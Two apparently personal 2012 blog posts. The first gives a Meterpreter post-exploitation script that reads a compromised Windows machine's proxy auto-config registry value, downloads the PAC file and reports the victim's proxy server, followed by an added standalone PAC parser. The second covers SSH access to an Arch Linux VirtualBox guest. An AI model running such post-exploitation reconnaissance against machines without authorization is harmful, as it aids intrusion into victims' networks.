Sunday, 12 February 2012

Reading proxy auto config (pac) file with meterpreter

Since I am a web-security person (duh duh), please pardon me if you find this erroneous or useless.

The following Meterpreter script is an example of reading the proxy auto-config (PAC) file to find the proxy servers used by the compromised machine.

Tested on Windows XP only.

#This is just a concept of reading the PAC file from the compromised machine.
#You can take the stuff ahead from here :-)
#oldmanlab@gmail.com

#Variable initialization
session = client

if session.platform =~ /win32|win64/

  #Read the key and get the AutoConfigURL value (the registry path must stay on one line)
  open_key = session.sys.registry.open_key(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Internet Settings', KEY_READ)
  begin
    url = open_key.query_value('AutoConfigURL').data
    print_status('Reading pac file.....')

    #Download the pac file with URLDownloadToFileW through railgun
    #(the copy is written to the working directory of the meterpreter process)
    session.railgun.add_dll('urlmon', 'urlmon')
    session.railgun.add_function('urlmon', 'URLDownloadToFileW', 'DWORD', [['PBLOB', 'pCaller', 'in'],
      ['PWCHAR', 'szURL', 'in'], ['PWCHAR', 'szFileName', 'in'], ['DWORD', 'dwReserved', 'in'], ['PBLOB', 'lpfnCB', 'inout']])
    session.railgun.urlmon.URLDownloadToFileW(nil, url, 'proxy.pac', 0, nil)

    #Read the file and search for the proxy servers
    proxy_data = ''
    temp = session.fs.file.new('proxy.pac', 'rb')
    until temp.eof?
      proxy_data << temp.read
    end
    temp.close

    #Only the first PROXY directive is reported; a PAC file may return several
    match = proxy_data.match(/PROXY(.*)";/)
    if match
      print_status('The proxy server is: ' + match[1].strip)
    else
      print_status('No PROXY directive found in pac file')
    end

  rescue => e
    #No AutoConfigURL value, download failure or unreadable file all end up here
    print_status('No pac file found (' + e.message + ')')

  ensure
    open_key.close
  end
else
  print_status('Victim is not using Windows')
end

I had never coded in Ruby before, so any suggestions are welcome.
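As an added example that is not part of the original post: a stand-alone Ruby parser for the return strings of a PAC file, which lists every PROXY/SOCKS endpoint the file can hand out instead of only the first match the script above grabs. The sample PAC, its hostnames and its ports are constructed for the demo.

```ruby
# Constructed sample PAC file; hostnames and ports are made up for the demo.
SAMPLE_PAC = <<~'PAC'
  function FindProxyForURL(url, host) {
    if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example"))
      return "DIRECT";
    if (shExpMatch(url, "https:*"))
      return 'PROXY proxy-a.example:8080; PROXY proxy-b.example:8080; DIRECT';
    return "SOCKS5 socks.example:1080; PROXY proxy-a.example:8080";
  }
PAC

# Directive keywords a PAC return value may use.
PROXY_TYPES = %w[PROXY HTTP HTTPS SOCKS SOCKS4 SOCKS5].freeze

# Every string literal handed to a `return` statement in the PAC body.
def pac_return_strings(pac_text)
  pac_text.scan(/\breturn\s+(?:"([^"]*)"|'([^']*)')/).map { |dq, sq| dq || sq }
end

# Parses one return value ("PROXY a:8080; SOCKS5 b:1080; DIRECT") into
# {type:, host:, port:} hashes. DIRECT carries no host/port; unknown or
# malformed directives are skipped instead of raising.
def parse_pac_directives(return_value)
  return_value.split(';').map do |entry|
    type, target = entry.strip.split(/\s+/, 2)
    next if type.nil?
    type = type.upcase
    if type == 'DIRECT'
      { type: 'DIRECT', host: nil, port: nil }
    elsif PROXY_TYPES.include?(type) && target && target.include?(':')
      host, port = target.split(':', 2)
      { type: type, host: host, port: port.to_i }
    end
  end.compact
end

# Distinct proxy endpoints the PAC file can route traffic through, in order
# of first appearance; DIRECT entries are dropped.
def pac_proxy_endpoints(pac_text)
  pac_return_strings(pac_text)
    .flat_map { |rv| parse_pac_directives(rv) }
    .reject { |d| d[:type] == 'DIRECT' }
    .uniq
end

if __FILE__ == $PROGRAM_NAME
  pac_proxy_endpoints(SAMPLE_PAC).each { |d| puts "#{d[:type]} #{d[:host]}:#{d[:port]}" }
end
```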

Wednesday, 8 February 2012

SSH access to archlinux guest in virtualbox

For me, having the Metasploit Framework installed on a headless, lightweight operating system whose memory needs can be met with 50-80 MB of RAM was the reason to install Arch Linux.

This post shows quick and dirty steps to configure VirtualBox so that an Arch Linux guest on NAT can be reached over SSH.

Environment:

Host : Windows
Guest: Arch Linux 64-bit
VirtualBox: 4.1.8

Power off your guest operating system. Go to the settings of your guest and select Network. Set up Adapter 1 as NAT and Adapter 2 as Host-Only Adapter, as in the following screenshots.

Ipconfig on my Windows host shows the following configuration.

Power on your guest. Log in as root and bring up the second interface with the following command (the address is not persistent across reboots):

ifconfig eth1 inet 192.168.7.2 netmask 255.255.255.0 up

From your host system you will now be able to ping 192.168.7.2 and SSH to 192.168.7.2 with an SSH client such as PuTTY.